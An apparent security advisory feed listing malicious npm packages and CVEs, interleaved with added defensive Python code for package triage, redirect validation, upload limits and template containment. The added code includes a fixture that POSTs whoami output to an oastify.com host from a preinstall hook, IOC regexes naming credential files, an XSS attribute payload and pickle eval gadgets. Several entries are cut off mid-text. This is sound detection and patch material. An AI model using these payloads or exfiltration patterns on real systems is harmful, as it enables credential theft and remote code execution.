| Risk / Label | Published | |
|---|---|---|
| Risk ? / 10 MAL-2026-6067 | 2 hour(s) ago | |
| Source: amazon-inspector (9a7779ff21d9783e1026e13a7abf65e448c5f3d3d111f3cae539f3690e53a2b4). The CLI binary at bin/scan-only.js, when invoked (e.g., via `npx scan-only --diagnose`), harvests secrets from the installing host and ships them to a hardcoded attacker endpoint, then fetches and executes attacker-controlled shell commands. Specifically, the binary reads ~/.gitconfig, ~/.ssh, ~/.npmrc (npm token), ~/.aws/credentials, ~/.docker/config.json, ~/.bash_history, ~/.zsh_history, the full process.env, os.userInfo(), and network interfaces, packages them into a `recon` object, and POSTs them to https://sentry.citadel-casino.com/collect with a hardcoded `x-api-key` header and user-agent `citadel-diagnose/0.2.0`. It also fetches https://sentry.citadel-casino.com/decoy, runs a `refineText()` routine that extracts a hidden command as an acrostic of first letters terminated by `endofpayload`, unescapes tokens such as `sbslash` to `\`, and passes the result to execSync via `/bin/sh` on Unix or `powershell -EncodedCommand` on Windows, giving the operator of sentry.citadel-casino.com arbitrary code execution on the host running the CLI. The exfiltration is masked by fake `Sentry Diagnostic Tools v1.2.0` console banners, and the Sentry-lookalike subdomain on citadel-casino.com is brand-impersonation cover. package.json's generic `Diagnostic tool` description and `scan-only` bin name disguise the binary's true `citadel-diagnose` identity. The payload fires the moment a developer or CI system runs the CLI. | ||
| Risk ? / 10 MAL-2026-6071 | 2 hour(s) ago | |
| Source: amazon-inspector (fa97d4701c29ef5305fa5b553ab560abd6db6cc33b72f99dc11621997b668f32). The package presents as an n8n community node but is an attack artifact. The node's execute() in dist/SecurityTestNode.node.js queries AWS IMDSv1/v2 (http://169.254.169.254/latest/meta-data/iam/security-credentials/) and the ECS metadata endpoint (169.254.170.2) for IAM role credentials, then iterates process.env to harvest every key matching /AWS|AMAZON|ECS|ECR/i, and returns all of it in the node's workflow output. Anyone who adds this node to a workflow on an EC2/ECS host leaks the host IAM role's STS credentials and AWS environment variables into the workflow output (which is typically persisted or logged): direct AWS account compromise. The tarball additionally ships preinstall.js, which runs `id && hostname && whoami && uname -a && cat /etc/os-release`, writes /tmp/n8n-rce-proof.txt, and POSTs the recon output to https://worker.n8n-prod.schibsted.com/rest/variables (with rejectUnauthorized:false) and to 127.0.0.1:5678/rest/variables, using a hardcoded `n8n-auth` JWT cookie belonging to a third-party organisation's n8n deployment. package.json does not declare a preinstall lifecycle hook, so the recon payload does not auto-fire on `npm install`, but the file is bundled as a ready-to-run RCE proof and the JWT is redistributed to anyone who installs the package. The combination of (a) credential-harvesting node code reachable on first workflow execution, (b) a shipped exfiltration payload with hardcoded victim infrastructure, and (c) redistribution of a third-party auth token makes this an attack artifact regardless of the author's stated PoC framing. | ||
| Risk ? / 10 MAL-2026-6069 | 2 hour(s) ago | |
| Source: amazon-inspector (e51e58cf925eb7dd4e084a2e78e22b0a0db0f1f82663101e34110258839f98f7). The package declares `"preinstall": "node index.js"` in package.json, so index.js executes automatically on `npm install`. index.js requires `child_process`, `os`, `https`, and `http`, then collects host and user identity (`whoami`, `id`, `os.hostname()`, `process.platform`, architecture, homedir, `os.userInfo()` with username/uid/gid/shell, OS details, and cwd) and POSTs it as JSON to the hardcoded URL `https://277k5lhnsb38srix1rr2le9g177yvpje.oastify.com/detox56` (oastify.com is the Burp Collaborator out-of-band interaction service, commonly abused as recon/C2 infrastructure). The package ships no legitimate functionality (empty description, empty author, no UI code despite the `bot-ui` name), and the `@civitatis` scope plus generic name shape are consistent with a dependency-confusion attack against an internal namespace. Installing this package on any developer machine or CI runner immediately leaks host identity to the attacker. | ||
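The three entries above share a small set of static indicators: a lifecycle hook in package.json (MAL-2026-6069), IMDS/ECS metadata addresses (MAL-2026-6071), and source files that combine a shell-execution primitive with network I/O, credential-file paths or an out-of-band domain (MAL-2026-6067). The triage script below checks an unpacked package for exactly those. It is an added example, not code from the packages, the feed or amazon-inspector; the indicator strings come from the advisories, the regexes and the `build_fixture()` package are mine, and the fixture is a constructed look-alike of MAL-2026-6069, not the real package.

```python
"""Static triage of an unpacked npm package for the indicators described in
the three malicious-package entries above. Added example; the fixture is
constructed and the regexes are an assumption of what is worth flagging."""
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare",
                   "preuninstall", "postuninstall"}

# Indicator strings taken from the advisories above; the regexes are mine.
IOC_PATTERNS = {
    "imds": re.compile(r"169\.254\.169\.254|169\.254\.170\.2"),
    "oob-domain": re.compile(r"\boastify\.com\b"),
    "secret-path": re.compile(
        r"\.npmrc|\.aws/credentials|\.ssh\b|\.docker/config\.json|"
        r"\.(?:bash|zsh)_history|\.gitconfig"),
    "shell-exec": re.compile(r"\bexec(?:Sync)?\s*\(|\bspawn(?:Sync)?\s*\(|"
                             r"powershell\s+-EncodedCommand"),
    "network": re.compile(r"\brequire\(['\"](?:https?|net|dns)['\"]\)|\bfetch\s*\("),
    "private-key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}
SOURCE_SUFFIXES = {".js", ".cjs", ".mjs", ".ts", ".json"}


def audit_package(pkg_dir):
    """Return (location, finding) tuples for one unpacked package directory."""
    pkg_dir = Path(pkg_dir)
    findings = []
    manifest = json.loads((pkg_dir / "package.json").read_text(encoding="utf-8"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            # Anything here runs on `npm install` with the installer's privileges.
            findings.append(("package.json", f"lifecycle hook {hook}: {cmd}"))
    for path in sorted(pkg_dir.rglob("*")):
        if not path.is_file() or path.suffix not in SOURCE_SUFFIXES or path.name == "package.json":
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = {name for name, rx in IOC_PATTERNS.items() if rx.search(text)}
        rel = path.relative_to(pkg_dir).as_posix()
        findings.extend((rel, name) for name in sorted(hits))
        # Shell execution plus network I/O in one file is the fetch-and-run
        # shape of MAL-2026-6067; flag it even when no known domain matches.
        if {"shell-exec", "network"} <= hits:
            findings.append((rel, "exec+network: possible remote command execution"))
    return findings


def build_fixture():
    """Write a constructed package that mimics the shape of MAL-2026-6069."""
    root = Path(tempfile.mkdtemp(prefix="npm-audit-"))
    (root / "package.json").write_text(json.dumps({
        "name": "demo-bot-ui", "version": "1.0.0",
        "scripts": {"preinstall": "node index.js"},
    }), encoding="utf-8")
    (root / "index.js").write_text(
        "const https = require('https');\n"
        "const { execSync } = require('child_process');\n"
        "const who = execSync('whoami').toString();\n"
        "https.request('https://example.oastify.com/x', { method: 'POST' }).end(who);\n",
        encoding="utf-8")
    return root


if __name__ == "__main__":
    for location, finding in audit_package(build_fixture()):
        print(f"{location}: {finding}")
```

Run it against the `node_modules/<name>` directory of a fresh `npm pack`/extract rather than an already-installed tree, since a lifecycle hook has by then already run; `npm install --ignore-scripts` is the complementary install-time control.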
| Risk 5 / 10 CVE-2026-55590 | 2 hour(s) ago | |
| ### Impact The `getLoginRedirect()` method does not account for backslashes in the redirect target, so a crafted value can pass the local-redirect check while browsers resolve it to an attacker-controlled hostname. ### Patches Versions 3.3.6 and 4.1.1 contain a fix for this issue. ### Workarounds If you are unable to upgrade, add application-level validation of the redirect query-string parameter (reject any value containing a backslash or beginning with `//`) to mitigate this vulnerability. | ||
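The mechanism behind the advisory above is that browsers following the WHATWG URL parser treat `\` like `/` in http(s) URLs, so a target such as `/\evil.example` or `\\evil.example` becomes `//evil.example`, a protocol-relative redirect to an attacker host, while server-side parsers such as Python's `urlparse()` still see a path with no hostname. The validator below is an added example, not the affected project's code; the function names and the test inputs are mine.

```python
"""Local-redirect validation that closes the backslash bypass.
Added example, not the affected project's code."""
from urllib.parse import urlparse


def naive_is_local(target):
    """The bypassable shape: 'no scheme, no netloc, starts with /'.
    urlparse() only recognises '//' as a netloc prefix, so '/\\evil.example'
    parses as a bare path and passes."""
    parts = urlparse(target)
    return parts.scheme == "" and parts.netloc == "" and target.startswith("/")


def is_safe_local_redirect(target):
    if not isinstance(target, str) or not target:
        return False
    # Reject anything a browser could reinterpret: backslashes, control
    # characters (CR/LF injection, tab/newline stripping), spaces and DEL.
    if any(ch == "\\" or ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in target):
        return False
    # Exactly one leading slash: '/x' is origin-relative, while '//host' and
    # '///host' are host-relative to the browser.
    if not target.startswith("/") or target.startswith("//"):
        return False
    parts = urlparse(target)
    return parts.scheme == "" and parts.netloc == ""
```

The allowlist shape (accept only what is provably origin-relative) is deliberate: enumerating bad prefixes misses the next encoding trick, whereas a single leading `/` followed by characters a browser cannot reinterpret leaves no hostname for the client to resolve.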
| Risk 9.5 / 10 CVE-2026-55518 | 2 hour(s) ago | |
| ## Summary
A critical missing authorization flaw exists in Avo's association attach workflow. The UI and `GET /resources/:resource/:id/:related/new` path can check `attach_ |
| Risk 5 / 10 CVE-2026-55517 | 2 hour(s) ago | |
| ## Summary A Deno program that opens a client `WebSocket` connection could be crashed by the remote server. While handling the WebSocket handshake response, Deno parsed the `Sec-WebSocket-Protocol` and `Sec-WebSocket-Extensions` response headers in a way that assumed their bytes were always printable ASCII. A response header containing non-visible-ASCII bytes (`0x80`-`0xFF`) caused a panic that aborted the entire Deno process. ## Details When establishing a client WebSocket connection, Deno read the `Sec-WebSocket-Protocol` and `Sec-WebSocket-Extensions` headers from the server's `101 Switching Protocols` response and converted them to strings without handling the failure case. `HeaderValue::to_str()` returns an error for any value containing bytes outside the visible-ASCII range, so a header carrying such bytes triggered an unrecoverable error during conversion. Because the client initiates the outbound connection, the handshake response is fully controlled by the server. A server that returns bytes such as `0xFF 0xFE` in either header could therefore crash any client that connected to it. This is purely an availability issue. There is no information disclosure and no memory-safety impact; the only effect is termination of the current process. ## Impact Remote denial of service. Any Deno application that establishes WebSocket connections to untrusted or potentially-compromised endpoints could be terminated by the remote peer. Exploitation requires the victim application to initiate the outbound WebSocket connection. An attacker who controls the WebSocket endpoint, or who can man-in-the-middle a plaintext `ws://` connection, could trigger the crash. The effect is confined to crashing the process that opened the connection. ## Patch The issue is fixed in Deno `2.7.5`. The header values are now parsed with graceful fallbacks: values that cannot be represented as ASCII strings are skipped instead of aborting the process. 
A regression test covers a server that returns non-ASCII bytes in `Sec-WebSocket-Protocol`. Users should upgrade to Deno `2.7.5` or later. ## Workarounds Until you can upgrade, only connect to trusted WebSocket endpoints and prefer `wss://` (TLS) over `ws://`, which prevents a network man-in-the-middle from injecting malicious header bytes into the handshake response. | ||
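The handshake-side fix described above, as an added example in Python rather than Deno's own code: a `Sec-WebSocket-Protocol` or `Sec-WebSocket-Extensions` value that is not visible ASCII is skipped instead of being treated as fatal, and `strict=True` reproduces the pre-fix behaviour so the two can be compared. The raw response bytes in `SAMPLE_RESPONSE` are constructed for the demo.

```python
"""Tolerant parsing of a WebSocket 101 handshake response.
Added example, not Deno's code; SAMPLE_RESPONSE is constructed."""

TRACKED = {b"sec-websocket-protocol": "protocol",
           b"sec-websocket-extensions": "extensions"}


def is_visible_ascii(raw):
    """Same range HeaderValue::to_str() accepts: 0x20..0x7E inclusive."""
    return all(0x20 <= b <= 0x7E for b in raw)


def parse_handshake(raw, strict=False):
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response head")
    lines = head.split(b"\r\n")
    if not lines[0].startswith(b"HTTP/1.1 101 "):
        raise ValueError("not a 101 Switching Protocols response")
    result = {"protocol": None, "extensions": None, "skipped": []}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            continue
        key = TRACKED.get(name.strip().lower())
        if key is None:
            continue
        value = value.strip()
        if not is_visible_ascii(value):
            if strict:
                # Pre-fix shape: the conversion error was unhandled and
                # took the whole process down.
                raise ValueError(f"non-ASCII bytes in {key}: {value!r}")
            # Fixed shape: the header is server-controlled, so drop it and
            # carry on; the connection is still usable.
            result["skipped"].append(key)
            continue
        result[key] = value.decode("ascii")
    return result


# Constructed server response: a valid 101 whose subprotocol header carries
# the 0xFF 0xFE bytes the advisory names.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 101 Switching Protocols\r\n"
    b"Upgrade: websocket\r\n"
    b"Connection: Upgrade\r\n"
    b"Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=\r\n"
    b"Sec-WebSocket-Protocol: \xff\xfe\r\n"
    b"Sec-WebSocket-Extensions: permessage-deflate\r\n"
    b"\r\n"
)
```

The point generalises past these two headers: any field a remote peer controls must be parsed with a failure path that is local to that field, not one that propagates out of the connection handler.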
| Risk 9.5 / 10 CVE-2026-55471 | 2 hour(s) ago | |
| ### Summary
`org.hl7.fhir.utilities.XsltUtilities` exposes two parallel families of XSLT
transform helpers. The `transform(...)` overloads obtain their
`TransformerFactory` from the project's hardened helper
`XMLUtil.newXXEProtectedTransformerFactory()` (which sets
`ACCESS_EXTERNAL_DTD=""` and `ACCESS_EXTERNAL_STYLESHEET=""`). The sibling
`saxonTransform(...)` overloads instead instantiate a **bare**
`new net.sf.saxon.TransformerFactoryImpl()` with no external-access
restriction. A document transformed through any `saxonTransform(...)` overload
is parsed with external general entities and external DTD/parameter entities
enabled, so an attacker who controls (or can MITM) the transformed XML obtains
XML External Entity injection: local file disclosure and blind XXE / SSRF to
arbitrary URLs reachable from the host.
`XMLUtil` documents that its protected factory "should be the only place where
TransformerFactory is instantiated in this project". The `saxonTransform`
overloads violate that contract while their same-file `transform` siblings
honour it.
### Affected versions
`org.hl7.fhir.utilities` (Maven `ca.uhn.hapi.fhir:org.hl7.fhir.utilities`)
`<= 6.9.8` (latest release at time of report; verified live on `6.9.8`).
The bare `net.sf.saxon.TransformerFactoryImpl()` instantiation is present at
`XsltUtilities.java:61`, `:91`, and `:106`.
### Privilege required
None at the library boundary. The exposure depends on the calling tool: any
FHIR component that runs `XsltUtilities.saxonTransform(...)` over XML whose
source document, embedded DTD, or referenced stylesheet is attacker-influenced
(an IG package, a fetched/uploaded resource, a downloaded stylesheet, or a
MITM'd HTTP fetch) triggers the XXE. No DOCTYPE/entity stripping occurs before
the Saxon parser sees the bytes.
### Root cause
`org.hl7.fhir.utilities/src/main/java/org/hl7/fhir/utilities/XsltUtilities.java`:
```java
// VULNERABLE — bare factory, no external-access restriction (lines 60-73, 90-99, 105-128)
public static byte[] saxonTransform(Map |
| Risk 7.5 / 10 CVE-2026-55470 | 2 hour(s) ago | |
| ## Summary
The fix for CVE-2026-45367 added `RegexTimeout` protection to the `matches()` function in DSTU2016MAY, DSTU3, R4, R4B, and R5, but the DSTU2 module was incompletely patched. In `org.hl7.fhir.dstu2`, `replaceMatches()` was updated while `matches()` at line 2462 still calls the raw `String.matches(sw)` without any timeout, allowing an unauthenticated attacker to trigger catastrophic regex backtracking and exhaust server CPU.
## Details
### Incomplete patch
Within the same file
(`org.hl7.fhir.dstu2/utils/FHIRPathEngine.java`), the two functions were
patched inconsistently:
**Line 2226 — replaceMatches() — PATCHED:**
```java
result.add(new StringType(
RegexTimeout.replaceAll(
convertToString(focus.get(0)), regex, repl, regexTimeoutMillis)));
```
**Line 2462 — matches() — NOT PATCHED:**
```java
result.add(new BooleanType(
convertToString(focus.get(0)).matches(sw)));
// ↑ raw String.matches() — no RegexTimeout, no complexity check
```
**DSTU3 line 2447 — matches() — PATCHED (for comparison):**
```java
result.add(new BooleanType(
RegexTimeout.matches(st, sw, regexTimeoutMillis)));
```
### Module-by-module status
| Module | `matches()` | `replaceMatches()` |
|---|---|---|
| **DSTU2** | ❌ raw `str.matches(sw)` | ✅ `RegexTimeout.replaceAll()` |
| DSTU2016MAY | ✅ `RegexTimeout.matches()` | ✅ |
| DSTU3 | ✅ `RegexTimeout.matches()` | ✅ |
| R4 | ✅ `RegexTimeout.matches()` | ✅ |
| R4B | ✅ `RegexTimeout.matches()` | ✅ |
| R5 | ✅ `RegexTimeout.matches()` | ✅ |
## PoC
**Requirements:** Java 17+, Maven 3.8+
**pom.xml dependencies:**
```xml
```
|
| Risk 9.5 / 10 CVE-2026-55450 | 2 hour(s) ago | |
| ### Summary
Unauthenticated users can upload an unlimited amount of data to the server. No prior knowledge is needed, only network access to Langflow.
This can lead to disk-space exhaustion on the server.
In addition, the response reports the absolute path of the uploaded file to the attacker, an information leak that can assist in chaining other primitives.
Tested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe
### Details
Code is in `langflow/api/v1/endpoints.py`:
```python
@router.post(
"/upload/{flow_id}",
status_code=HTTPStatus.CREATED,
deprecated=True,
)
async def create_upload_file(
file: UploadFile,
flow_id: UUID,
) -> UploadFileResponse:
...
```
As can be seen above, the route has no authentication dependency. Nor is `flow_id` validated, unlike on other endpoints:
```python
flow_id_str = str(flow_id)
file_path = await asyncio.to_thread(save_uploaded_file, file, folder_name=flow_id_str)
```
Function `save_uploaded_file` saves the file to local file-system.
Suggested fix:
1. Add authentication to route.
2. Only return relative path or filename.
### PoC
PoC:
```bash
curl 'http://localhost:7860/api/v1/upload/
```
|
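Server-side controls for the upload path described above, as an added example (not Langflow's code): the handler refuses unauthenticated callers, validates `flow_id` as a UUID before it becomes a folder name, streams the body under a byte cap so an oversized upload is cut off and the partial file removed, and reports only the flow-relative name. The folder layout, the cap and the `user` argument are assumptions for the demo.

```python
"""Authenticated, size-capped upload that never reveals the absolute path.
Added example, not Langflow's code; limits and layout are assumptions."""
import os
import re
import uuid
from pathlib import Path

MAX_UPLOAD_BYTES = 10 * 1024 * 1024   # assumed limit for the demo
CHUNK = 64 * 1024


class UploadTooLarge(Exception):
    pass


class InvalidFlowId(Exception):
    pass


def sanitize_filename(name):
    """Keep a plain basename: drop directory parts, odd characters, leading dots."""
    base = os.path.basename(name.replace("\\", "/"))
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base).lstrip(".")
    return base or "upload.bin"


def save_upload(stream, filename, flow_id, upload_root, user, max_bytes=MAX_UPLOAD_BYTES):
    """`stream` is any object with .read(n); `user` is the authenticated principal."""
    if user is None:
        raise PermissionError("authentication required")
    try:
        flow = uuid.UUID(str(flow_id))   # anything that is not a UUID cannot name a folder
    except ValueError:
        raise InvalidFlowId(str(flow_id)) from None
    folder = Path(upload_root) / str(flow)
    folder.mkdir(parents=True, exist_ok=True)
    safe_name = sanitize_filename(filename)
    dest = folder / safe_name
    written = 0
    try:
        with open(dest, "wb") as out:
            while True:
                chunk = stream.read(CHUNK)
                if not chunk:
                    break
                written += len(chunk)
                if written > max_bytes:
                    # Stop before the rest of the body is ever written to disk.
                    raise UploadTooLarge(f"exceeds {max_bytes} bytes")
                out.write(chunk)
    except UploadTooLarge:
        dest.unlink(missing_ok=True)     # don't leave the partial file behind
        raise
    # Relative name only: the absolute path stays on the server.
    return {"flowId": str(flow), "file_path": f"{flow}/{safe_name}", "size": written}
```

Checking the byte count while streaming is what makes the cap effective against disk exhaustion; a post-hoc `len(body)` check has already consumed the space.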
| Risk 7.5 / 10 CVE-2026-55760 | 2 hour(s) ago | |
| ### Impact Any application that passes user-controlled input to `Handlebars.compile()` using a `FileTemplateLoader` (or `ClassPathTemplateLoader`) is vulnerable to arbitrary file read via path traversal in the template name. This is a realistic attack surface for web applications that take template names from URL path parameters, request parameters, or other user-controlled sources. ### Patches com.github.jknack:handlebars:4.5.2 ### Workarounds Validate template names that are derived from user input before they reach the loader; for example, compare the canonical path of the resolved file against the canonical template prefix (the prefix check must run on the canonicalised path, otherwise `..` segments survive it):
```java
// file: the resolved template file; prefix: the loader's root; location: the user-supplied name
if (!file.getCanonicalPath().startsWith(new File(prefix).getCanonicalPath() + File.separator)) {
  throw new IOException("Path traversal attempt detected: " + location);
}
```
| ||
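Canonical-path containment for template names that come from user input, as an added example in Python (not the handlebars.java project's code). A plain string-prefix test on the un-canonicalised path is bypassable with `..` segments and also accepts sibling directories that merely share the prefix (`templates_evil/` next to `templates/`); resolving both sides and comparing path components avoids both. The directory names and the `.hbs` suffix are assumptions for the demo.

```python
"""Template-root containment check versus the bypassable prefix test.
Added example, not handlebars.java code; fixture directories are constructed."""
import os
import tempfile
from pathlib import Path


def naive_prefix_check(base_dir, name, suffix=".hbs"):
    """The bypassable shape: prefix test on a path that was never canonicalised."""
    base = Path(base_dir).resolve()
    candidate = base / (name + suffix)          # no resolve(): '..' survives
    return str(candidate).startswith(str(base))


def resolve_template(base_dir, name, suffix=".hbs"):
    """Return the template path, or raise ValueError if it would leave base_dir."""
    if "\x00" in name:
        raise ValueError("NUL byte in template name")
    base = Path(base_dir).resolve()
    # resolve() collapses '..' and follows symlinks. An absolute `name`
    # discards `base` in the join; the containment test below catches that.
    candidate = (base / (name + suffix)).resolve()
    if os.path.commonpath([str(base), str(candidate)]) != str(base):
        raise ValueError(f"template name escapes template root: {name!r}")
    return candidate


def build_fixture():
    """Constructed layout: templates/mail/welcome.hbs plus a prefix-sharing sibling."""
    root = Path(tempfile.mkdtemp(prefix="tpl-"))
    (root / "templates" / "mail").mkdir(parents=True)
    (root / "templates" / "mail" / "welcome.hbs").write_text("Hello {{name}}")
    (root / "templates_evil").mkdir()
    (root / "templates_evil" / "x.hbs").write_text("{{evil}}")
    return root / "templates"
```

`os.path.commonpath` compares whole components, which is why `templates_evil` is rejected even though `str.startswith` would accept it; appending a trailing separator to the prefix, as in the Java workaround above, achieves the same thing.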
| Risk 7.5 / 10 CVE-2026-55409 | 2 hour(s) ago | |
| In Filament v3, a disabled `RichEditor` field rendered its raw state without sanitizing HTML. Where the data stored in this field's state isn't sanitized already when the form state was filled, an attacker could plant malicious HTML or JavaScript and achieve XSS that executes for users who view the form. Please note that Filament v4 and above does not use the same mechanism for rendering a disabled `RichEditor` so this advisory does not apply. | ||
| Risk 7.5 / 10 CVE-2026-55405 | 2 hour(s) ago | |
| ### Summary
The MariaDB and pgvector embedding stores build metadata-filter SQL by string-concatenating
filter **keys** (and, in MariaDB, string **values**) directly into the query without adequate
escaping. A crafted metadata key in `EmbeddingSearchRequest.filter()` can break out of its SQL
context and inject arbitrary SQL into the statements executed by the stores' search and
`removeAll(Filter)` operations.
### Details
**pgvector — JSON mode (default, `COMBINED_JSON` / `COMBINED_JSONB`).** `JSONFilterMapper`
places the key inside a single-quoted SQL literal (the JSON key of the `->>` operator) with no
escaping:
(metadata->>' |
| Risk ? / 10 MAL-2026-6070 | 2 hour(s) ago | |
| Source: amazon-inspector (280cf690237f367f57670f695c85d84227b06c563f5f1c1c3f69d437c52cbfe4). Importing libsc-runtime-telemetry auto-invokes a bootstrap routine that schedules a periodic job collecting host identity (hostname, public IP, reverse DNS, ISP/geo/AS), network interfaces (including internal IPs and MACs), OS user info (username, uid, homedir), tmpdir, cwd, process.argv (which routinely contains secrets passed as CLI arguments in CI/CD), execPath, NODE_ENV, parent package name/version, and pid/ppid. The payload is POSTed as a row to a hardcoded Google Sheets spreadsheet ID (1rcJGX8rVZ_KlHvqcCQ5IzGLqQ2Er5E3_lI799FBUYcU) via Google service-account credentials bundled inside dist/bundled/reporter-config.js (client_email libsc-service-account-785@libsc-499701.iam.gserviceaccount.com, with an embedded RSA private key). The destination is not configurable by the consumer; only an opt-out env var (SKIP_LIBSC_CHECK) is honoured, making any application that depends on this library a silent feed of deployment fingerprints to the author. The shipped service-account private key additionally lets any installer write to the author's Google Cloud project, allowing tampering with data collected from other victims. | ||
| Risk 7.5 / 10 CVE-2026-7300 | 3 hour(s) ago | |
| Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional (Web Integration Service) allows Filter Failure through Buffer Overflow. This issue affects Connext Professional: from 7.4.0 before 7.*, from 7.0.0 before 7.3.1.3, from 6.1.2 before 6.1.*. | ||
| Risk 9.5 / 10 CVE-2026-53805 | 3 hour(s) ago | |
| NVIDIA Spatial Intelligence Lab's (SIL) GEN3C contains an unauthenticated remote code execution vulnerability in the inference API server where the /request-inference and /seed-model endpoints deserialize raw HTTP request bodies using Python's pickle.loads() without authentication or input validation. Attackers can supply a crafted payload containing a __reduce__ gadget to the inference API port to achieve remote code execution as the inference process. | ||
| Risk 5 / 10 CVE-2026-48591 | 3 hour(s) ago | |
| Improper Neutralization of Script in Attributes in a Web Page vulnerability in pragdave earmark allows stored cross-site scripting via unescaped HTML attribute values. `'Elixir.Earmark.Transform':_make_att1/2` in lib/earmark/transform.ex splices attribute values verbatim between two literal `"` bytes: `[" ", name, "=\"", value, "\""]`. Text nodes are routed through the existing escape function, which encodes `"` as `&quot;`, but attribute values never take that path. A markdown link whose URL or title contains a bare `"` closes the attribute early and lets the trailing bytes be parsed by the browser as fresh HTML attributes. For example, `[click](http://example.com/?a=x" onerror="alert(1))` renders as `<a href="http://example.com/?a=x" onerror="alert(1)">click</a>`, executing arbitrary JavaScript in the victim's browser. The earmark library is no longer maintained and has been retired on Hex. No patched version will be released. All releases from 1.4.1 onward are affected, and users should migrate to a maintained Markdown library such as MDEx. This issue affects earmark from 1.4.1 onward. | ||
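The attribute splice described above next to its escaped form, as an added example (not Earmark's code): `make_att_vulnerable` mirrors the verbatim splice, `make_att_safe` runs the value through the same kind of escaping text nodes already get, and `parse_attrs` uses the stdlib HTML tokenizer to show what a browser would see, namely a second attribute in the unescaped output and none in the escaped one. The link payload is the advisory's own example; the function names are mine.

```python
"""Attribute-value escaping in a Markdown link renderer, vulnerable and
fixed side by side. Added example, not Earmark's code."""
import html
from html.parser import HTMLParser


def make_att_vulnerable(name, value):
    # Value spliced verbatim between two literal quote characters.
    return f' {name}="{value}"'


def make_att_safe(name, value):
    # quote=True also turns " and ' into entities, so the value can no
    # longer close the attribute early.
    return f' {name}="{html.escape(value, quote=True)}"'


def render_link(url, text, title=None, safe=True):
    att = make_att_safe if safe else make_att_vulnerable
    attrs = att("href", url) + (att("title", title) if title else "")
    return f"<a{attrs}>{html.escape(text)}</a>"


class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.attrs = attrs


def parse_attrs(markup):
    """Attribute list of the first <a> tag as the HTML tokenizer sees it."""
    p = _AttrCollector()
    p.feed(markup)
    return p.attrs


# The advisory's example link target.
PAYLOAD_URL = 'http://example.com/?a=x" onerror="alert(1)'
```

Escaping the quote is necessary but not sufficient for `href`: a scheme allowlist (`http`, `https`, `mailto`, relative) is the separate control that stops `javascript:` URLs, which this advisory does not cover.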
| Risk 9.5 / 10 CVE-2026-3894 | 3 hour(s) ago | |
| Out-of-bounds Read vulnerability in RTI Connext Professional (Core Libraries) allows Overread Buffers. This issue affects Connext Professional: from 7.4.0 before 7.7.0, from 7.0.0 before 7.3.1.3, from 6.1.0 before 6.1.*, from 6.0.0 before 6.0.*, from 5.3.0 before 5.3.*, from 5.0.0 before 5.2.*. | ||
| Risk 2 / 10 CVE-2026-39199 | 3 hour(s) ago | |
| snes9x 1.63 allows an out-of-bounds write and denial of service via a crafted .ups file. | ||
| Risk 7.5 / 10 CVE-2026-30802 | 3 hour(s) ago | |
| Out-of-bounds Read vulnerability in RTI Connext Micro (Core Libraries) allows Overread Buffers. This issue affects Connext Micro: from 4.0.0 before 4.3.0. | ||
| Risk 7.5 / 10 CVE-2026-30803 | 3 hour(s) ago | |
| Integer Underflow (Wrap or Wraparound) vulnerability in RTI Connext Micro (Core Libraries) allows Overread Buffers. This issue affects Connext Micro: from 4.0.0 before 4.3.0. | ||
| Risk 5 / 10 CVE-2026-30799 | 3 hour(s) ago | |
| Missing Authentication for Critical Function vulnerability in RTI Connext Professional (Security Plugins) allows Identity Spoofing. This issue affects Connext Professional: from 7.4.0 before 7.7.0, from 7.0.0 before 7.3.*, from 6.1.0 before 6.1.*, from 6.0.0 before 6.0.*, from 5.3.0 before 5.3.*. | ||
| Risk 5 / 10 CVE-2026-2675 | 3 hour(s) ago | |
| Missing Authentication for Critical Function vulnerability in RTI Connext Professional (Security Plugins) allows Fake the Source of Data. This issue affects Connext Professional: from 7.4.0 before 7.7.0, from 7.0.0 before 7.3.1.3, from 6.1.0 before 6.1.*, from 6.0.0 before 6.0.*, from 5.3.0 before 5.3.*. | ||
| Risk 9.5 / 10 CVE-2026-20266 | 3 hour(s) ago | |
| In Splunk AI Toolkit versions below 5.7.4, a user who holds the "admin" Splunk role could execute arbitrary OS commands on the host running the Splunk Enterprise instance. The vulnerability is possible because of an unsafe shell execution pattern in the btool configuration helper, which constructs OS command strings from dynamic parameters without disabling shell interpretation. | ||
| Risk 9.5 / 10 CVE-2026-53874 | 4 hour(s) ago | |
| picklescan before 1.0.1 contains a detection bypass in its unsafe-deserialization scanning: `eval` calls nested under callable objects and reached via `getattr` are not flagged, so an attacker can craft a pickle file that passes the scan but executes arbitrary code when it is loaded from an untrusted source. | ||
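The two entries above are the two halves of the same problem: GEN3C (CVE-2026-53805) calls `pickle.loads()` on attacker-supplied bytes, and picklescan (CVE-2026-53874) fails to flag a payload whose dangerous callable is only obtained at load time through `getattr`. The block below is an added example, none of it GEN3C's or picklescan's code. It builds both payload shapes (each evaluates the harmless expression `6*7` instead of a real command), lists the globals a pickle imports the way opcode-based scanners do, shows that a toy name denylist catches the plain `__reduce__` gadget but not the nested one, and gives the allowlisting `Unpickler` that refuses both regardless.

```python
"""Pickle gadget shapes, a toy scanner that misses the nested one, and the
allowlisting loader that refuses both. Added example; nothing here is
GEN3C's or picklescan's code, and both payloads are constructed."""
import builtins
import io
import pickle
import pickletools


class EvalGadget:
    """Plain __reduce__ gadget: pickles as a direct reference to builtins.eval."""
    def __reduce__(self):
        return (eval, ("6*7",))


REDUCE_PAYLOAD = pickle.dumps(EvalGadget(), protocol=4)

# Hand-written protocol-0 opcodes: getattr(__import__('builtins'), 'eval')('6*7').
# No opcode names eval directly, so a name-based denylist sees nothing.
NESTED_PAYLOAD = (
    b"cbuiltins\ngetattr\n"
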